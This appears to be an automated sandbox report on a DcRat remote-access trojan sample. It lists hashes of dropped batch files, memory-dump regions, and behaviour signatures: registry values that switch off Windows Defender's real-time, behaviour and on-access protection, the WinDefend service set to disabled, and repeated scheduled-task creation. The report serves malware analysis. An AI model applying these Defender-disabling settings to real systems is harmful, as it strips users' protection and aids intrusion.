| SHA512 | 62f0c86b4ef41c664736b5c2bd6d9fb868c3ae68d7688c40de3b2dee4c8f6d291361d8f13199b2347e524ac56bcdc1fd6e9c38a492f9c59dd0cf62c1293ecb3a |
memory/1608-125-0x0000000000370000-0x0000000000594000-memory.dmp
memory/1608-126-0x00000000020B0000-0x0000000002106000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\b7oBPqXqtO.bat
| MD5 | 2000ad2a4f5c23380024e9db6f9cef02 |
| SHA1 | 6924ec9921205d02f6824f208d373f505afae7b5 |
| SHA256 | 11aabb024a5673d908b5df9fc4b0100a75ad5e48605d118e6591c212ae86d347 |
| SHA512 | 5511cccb3cb73acfc59724975e92cde0a24c4a7c1f32399ff38c83330b92299d7e508d22de5581da5758f0f678d55d7115ab80d62d6692d4dee2aaaf754fcc8c |
memory/2232-133-0x0000000000950000-0x0000000000B74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat
| MD5 | af58a175f03d595f8276bd3441112d60 |
| SHA1 | 23403f89d09a083fb9710f5adbcbddfccab0d765 |
| SHA256 | c910b6a3e9a742b3e9f34851844079241f272b0b159eb9a9d7d982cc0e98bd67 |
| SHA512 | f92d36d25469fba588991be563eca8787ad65c5b5295f54e61543bb1ad9c98352d8eeaf4d06e2a951b4b998999227ae911f13a4680c8bcdd2c65eb6f37dd0078 |
memory/2008-140-0x0000000000EB0000-0x00000000010D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UucX7bnqC8.bat
| MD5 | 052f447696425a5548ceda755a697895 |
| SHA1 | d9ee05f9eded5410a770f60af8c686b96fe7e9e3 |
| SHA256 | 908b5afae7857a47a3b1082a809dfcf8f65dee7331c149979033607b7b5b986b |
| SHA512 | b5706aa5beb78f8b6a6de150c5bbda564340f727ae5415f10bec9ab39109846d80af47a3b318a012c516b1a3214763f6c1cf06d45f63818f8fff00274c61419b |
C:\Users\Admin\AppData\Local\Temp\FIx4sKIZfl.bat
| MD5 | 55118db681e1df3f90964879125c604b |
| SHA1 | 0035cc488e74a82b2644c4902aad1bd259322053 |
| SHA256 | d378426e7b25bbe9711a43e52ff3851d69d3ef3aa050a192371a6f02bfa55e5c |
| SHA512 | 0526694d8e2a2a45e7c3448ef94c36eb1eea258d672375b5b9dedf0e757cce54d0fba8399da7c177a9fc877a4427713542b2ed1bf58df1099a28d7db1987097c |
memory/2552-153-0x00000000011C0000-0x00000000013E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EYKlAcFNfO.bat
| MD5 | 7b265cbaeb1fb2e627f0566a5ae0e2f4 |
| SHA1 | c99fc749979fbe76f02a3ac6c8c2e68ab1c7406e |
| SHA256 | 426e8b7546f88e843f4909e4bee3a7fd32c0f552c66750473933bb6d796b80c5 |
| SHA512 | acbe25f8ffb3e5c752c8cb3fe1fee7f4425b93fdd0d200104e2caa3fedfa2ff14a7d32d852d54a8ccddf99e8cf01b5d5f0f462e9db914db02299073caeef6133 |
memory/2284-160-0x0000000000620000-0x0000000000676000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat
| MD5 | 860fa076d02e09eb8c3e41c9d4c5f8b0 |
| SHA1 | fd69ee8b387620fe03d373433e44d2518dc3e44e |
| SHA256 | 7b2de268908ac92cef856f3730879c22578eeef519d767f35a0178fc69d3476b |
| SHA512 | 2ce6aaedde803551e7fd04e22cfeea33fa49f90e2c7bb4187dcb48cbd181738537d88bb64cae4ab57302d559889230e1cde25706d06334130bff958e130ec0bf |
C:\Users\Admin\AppData\Local\Temp\L9j9zErPDE.bat
| MD5 | c08c5835d7da2ff7c5d71134559acf41 |
| SHA1 | 61c92a80277d8fc19de629056c4671670c79f714 |
| SHA256 | 57bf22a15124ed06f15748b987f144797027cdac28189277d7d28da4781f4b81 |
| SHA512 | bb0ebffed51f9e27e00db227963cde10a30e450b674b9caa3e31e5c3be4eaf9e647b98030a9bc526b3d6514a0b955d38dcfdcd827df9efb915e38b3a3240dd5e |
memory/2180-179-0x0000000000360000-0x0000000000584000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat
| MD5 | a16dcae3d73bf4bb0ed63ec7f3d8e62c |
| SHA1 | 21cb72b7f6ba0c759fde60c6ceb189d27a13fd2d |
| SHA256 | 5f289db73a0bf5b750187dfdac5940110ec479bf91118ccf570bfd67a771a07b |
| SHA512 | 0279ae264743109364e26577bd6500e34ee26a4a3520f247acd9938664af3e88e1f122a4db360e27c71266b19d4e83ceb603a0d1b00fd6edb4cf6a9acd6bfc28 |
memory/3052-186-0x0000000000160000-0x0000000000384000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sPXGbYzrvf.bat
| MD5 | 842cc854180a35de61342e8e70cdf72d |
| SHA1 | 91db87cb3df45f0d5a8798b9a8dcc2b8285a8907 |
| SHA256 | f304b85e651a23ec7d5c79b581dde09f7d9b2d6ccf44872e3c55b58556e3826b |
| SHA512 | d70552d78f4baeef002af98e484e8e563a9674c3c19b68dab43657d9278cff5bc76d10b27e02e2fb78df43834f79583e8daf80a04c330d315c67d0b06dacdb15 |
memory/880-193-0x0000000000AF0000-0x0000000000D14000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0P1AeAAEDQ.bat
| MD5 | 63cbf982ccde2f294846f54e1c935181 |
| SHA1 | 8ecb425b37c7925f00393583b574e283410b27e5 |
| SHA256 | 751bd3cbe0687acb6b7819cc2146ff23772fbb66205e7a0501209ef86a2513f2 |
| SHA512 | b935e127969f202750abac448e035e8938800eff2471c70a26d716ee03f4ee6f7f098334c13105f02215c05b468da53525b37ba844250f64d287699c9bdec265 |
memory/852-200-0x0000000000200000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat
| MD5 | e6c26c08ed5a7faed626b3d753ca97bb |
| SHA1 | f5300bcb18a3f2933aa553a1b478a7ce8d587b0a |
| SHA256 | 305e4578ef21d10bc0b86b98d9bb30ce1ca733ad2a0cb5824a840f780b6f6535 |
| SHA512 | 66a23eb46a03aab8295883f6b6e02e5a7e4edd04ab23c3c515753bed719f51b07f0f777aae78c31c24704f7e347baebd24047aa816ff2558bde54281fe9f830b |
memory/2140-207-0x0000000000220000-0x0000000000444000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uuaNNDTqg5.bat
| MD5 | b7c9a10199d91306b98585ebbc7b0319 |
| SHA1 | fa54a12ff377e5cc5e084efd545b54dbf662a860 |
| SHA256 | 1a3584d8f3b32a4bea2314a4d7872bff923b48b4ef1f4110f8190c2daf8e232b |
| SHA512 | afd9f8f6551b9f6008260127ce0ba487fd7f8eb72b599c8c855ae70ac0d09df7aa36fbc3ca2a518a5cedaa8e4b9dcc73f20a921154c534d04589f8df1c6f80ba |
memory/2376-214-0x0000000000C20000-0x0000000000E44000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat
| MD5 | e14c4926700d44b8e08e0ca05164e5c8 |
| SHA1 | 8ce0dd507f2382a91c27b158f938f24c078d626b |
| SHA256 | aa722a447610cadeb5dc0e31536dfa5e955f740db5be510fe49da6cdcc7c146e |
| SHA512 | 965ff0473de0afda4302f7b79d13ad1e654ea73d9c4834887a84b0502f03224c04cb6705ec13ab960dfd30ab66f56b753672684f1f227b7d18a9ca8480eabf3c |
C:\Users\Admin\AppData\Local\Temp\tebxeZNirC.bat
| MD5 | 77176a2f8916dbf320ece509674b9ac7 |
| SHA1 | 7090717508053605aecd9c60b6acf27396032e7d |
| SHA256 | 03cab28d558fae706a80b7fb00f6bc71b004e41b57e3b40943513bee9cbb9348 |
| SHA512 | 4bb38636ab2bc33699e76cba2e6391815a13e3741e20842bf85eb99443395ecafee2d8282e1490597842d5a98668cde9366245c8ee57d491d77f79dac753294e |
memory/2396-227-0x0000000001130000-0x0000000001354000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uxMZkGAiOs.bat
| MD5 | 39e0ed5a3af2eb4718f1dcb2f4698eb1 |
| SHA1 | f1b926135d30a2929ad7a218cb1fe9c24c1acb7e |
| SHA256 | 54af2c33dfb8e9d228b2daab6cbd51f19f7fd6da5ff5b65aa4cced61ca25afd7 |
| SHA512 | f8aa40fcdbb3f580077394a05bfceb0e41ab712aa22494d5479f3655d1ea2f1a9c5763d1f292ac8742d6363febb78bc27f4d388b8e9c357bbea9addfeb8c4f55 |
memory/612-234-0x0000000000B60000-0x0000000000BB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\WVE2eLfZN7.bat
| MD5 | 3d6de43c3906f5b40a81763df8af10d7 |
| SHA1 | 52b400efcffbaef2a91c1cd95775aaea8fc8b84e |
| SHA256 | 79ad1100e31e6b7bd25740319e0287c1d34ea07ffd1114864eb2dda00c3ce63c |
| SHA512 | 7186c1f40ff2f2b391b39ac3dd88e4682edc24be8a74eaea652e220f0b11187994205cb6d3c2942f2b6f69d9a1e5ef5c53ddf5e80de2645bc99427b643fa51cb |
C:\Users\Admin\AppData\Local\Temp\C0VS1u4WCC.bat
| MD5 | 144a498f347fa415fc6bbc05f6401e89 |
| SHA1 | 5ddc00e70c33fb6e31dd50af33de90ca3a86f8db |
| SHA256 | 22d12c0b4f91d170453d827ba2ca6a47c1c250e0c1ec99f85c822bdbbb51b412 |
| SHA512 | 1b05df596359c37bcf8a9d37c7046b980554250a4634c03509ffac37dbc8ef907a3190a21f24edc35c5c5e23a9cbc8d139c77e61725147635a25fc456ca822ea |
memory/964-255-0x00000000002F0000-0x0000000000514000-memory.dmp
memory/1040-260-0x00000000001E0000-0x0000000000404000-memory.dmp
memory/1584-265-0x0000000000E50000-0x0000000001074000-memory.dmp
memory/1792-270-0x0000000000390000-0x00000000005B4000-memory.dmp
memory/2332-275-0x0000000000130000-0x0000000000354000-memory.dmp
memory/2332-276-0x00000000007F0000-0x0000000000846000-memory.dmp
memory/592-281-0x00000000000C0000-0x00000000002E4000-memory.dmp
memory/592-282-0x00000000008D0000-0x0000000000926000-memory.dmp
memory/1536-287-0x0000000000860000-0x0000000000A84000-memory.dmp
memory/1536-288-0x000000001A6F0000-0x000000001A746000-memory.dmp
memory/2688-293-0x0000000001210000-0x0000000001434000-memory.dmp
memory/1668-298-0x0000000000590000-0x00000000005E6000-memory.dmp
memory/1584-323-0x00000000012A0000-0x00000000014C4000-memory.dmp
memory/3056-328-0x0000000000210000-0x0000000000434000-memory.dmp
memory/2352-333-0x0000000000840000-0x0000000000A64000-memory.dmp
memory/592-338-0x00000000013A0000-0x00000000015C4000-memory.dmp
memory/2776-343-0x00000000003B0000-0x00000000005D4000-memory.dmp
memory/2776-344-0x0000000002070000-0x00000000020C6000-memory.dmp
memory/2984-349-0x00000000003F0000-0x0000000000614000-memory.dmp
memory/2300-354-0x0000000000ED0000-0x00000000010F4000-memory.dmp
memory/1176-363-0x00000000003C0000-0x00000000005E4000-memory.dmp
memory/2308-368-0x0000000000FA0000-0x00000000011C4000-memory.dmp
memory/1160-373-0x00000000002E0000-0x0000000000504000-memory.dmp
memory/1780-378-0x0000000000330000-0x0000000000554000-memory.dmp
memory/3032-387-0x0000000000240000-0x0000000000464000-memory.dmp
memory/3032-388-0x0000000000630000-0x0000000000686000-memory.dmp
memory/888-393-0x00000000012D0000-0x00000000014F4000-memory.dmp
memory/888-394-0x0000000000760000-0x00000000007B6000-memory.dmp
memory/2704-403-0x0000000000430000-0x0000000000486000-memory.dmp
memory/2816-412-0x0000000000D50000-0x0000000000DA6000-memory.dmp
memory/560-421-0x0000000000270000-0x0000000000494000-memory.dmp
memory/3060-430-0x0000000000D90000-0x0000000000FB4000-memory.dmp
memory/852-435-0x00000000011D0000-0x00000000013F4000-memory.dmp
memory/1824-444-0x0000000000F00000-0x0000000001124000-memory.dmp
memory/2376-449-0x00000000012F0000-0x0000000001514000-memory.dmp
memory/2376-450-0x0000000000650000-0x00000000006A6000-memory.dmp
memory/2636-455-0x0000000001220000-0x0000000001444000-memory.dmp
memory/2636-456-0x0000000000B00000-0x0000000000B56000-memory.dmp
memory/2628-465-0x0000000000120000-0x0000000000344000-memory.dmp
memory/2628-466-0x0000000002220000-0x0000000002276000-memory.dmp
memory/2112-483-0x00000000001C0000-0x00000000003E4000-memory.dmp
memory/1156-496-0x00000000000D0000-0x00000000002F4000-memory.dmp
memory/2948-505-0x0000000000080000-0x00000000002A4000-memory.dmp
memory/2780-514-0x0000000000D50000-0x0000000000F74000-memory.dmp
memory/1072-523-0x0000000000590000-0x00000000005E6000-memory.dmp
memory/1688-528-0x00000000013D0000-0x00000000015F4000-memory.dmp
memory/2424-533-0x0000000000DA0000-0x0000000000FC4000-memory.dmp
memory/1820-546-0x0000000001080000-0x00000000012A4000-memory.dmp
memory/1372-551-0x00000000002B0000-0x00000000004D4000-memory.dmp
memory/472-556-0x00000000010E0000-0x0000000001304000-memory.dmp
memory/3064-557-0x0000000000CF0000-0x0000000000F14000-memory.dmp
memory/2460-562-0x0000000000FB0000-0x00000000011D4000-memory.dmp
memory/1580-567-0x0000000000710000-0x0000000000766000-memory.dmp
memory/2624-572-0x0000000000180000-0x00000000003A4000-memory.dmp
memory/2624-573-0x00000000007B0000-0x0000000000806000-memory.dmp
memory/2816-578-0x0000000000970000-0x0000000000B94000-memory.dmp
memory/1676-587-0x00000000001D0000-0x00000000003F4000-memory.dmp
memory/1608-592-0x0000000000D00000-0x0000000000D56000-memory.dmp
memory/2100-601-0x0000000000300000-0x0000000000524000-memory.dmp
memory/2144-606-0x0000000000A00000-0x0000000000C24000-memory.dmp
memory/2080-607-0x00000000010F0000-0x0000000001314000-memory.dmp
memory/2676-616-0x0000000000AF0000-0x0000000000B46000-memory.dmp
memory/2396-621-0x0000000000020000-0x0000000000244000-memory.dmp
memory/1572-630-0x00000000011A0000-0x00000000013C4000-memory.dmp
memory/2816-639-0x00000000001A0000-0x00000000003C4000-memory.dmp
memory/1712-644-0x00000000012C0000-0x00000000014E4000-memory.dmp
memory/1712-645-0x0000000001270000-0x00000000012C6000-memory.dmp
memory/2172-650-0x0000000000250000-0x0000000000474000-memory.dmp
memory/2220-655-0x0000000000840000-0x0000000000896000-memory.dmp
memory/2820-660-0x0000000001010000-0x0000000001234000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-22 19:12
Reported
2024-07-22 19:18
Platform
win10v2004-20240709-en
Max time kernel
247s
Max time network
299s
Command Line
Signatures
DcRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
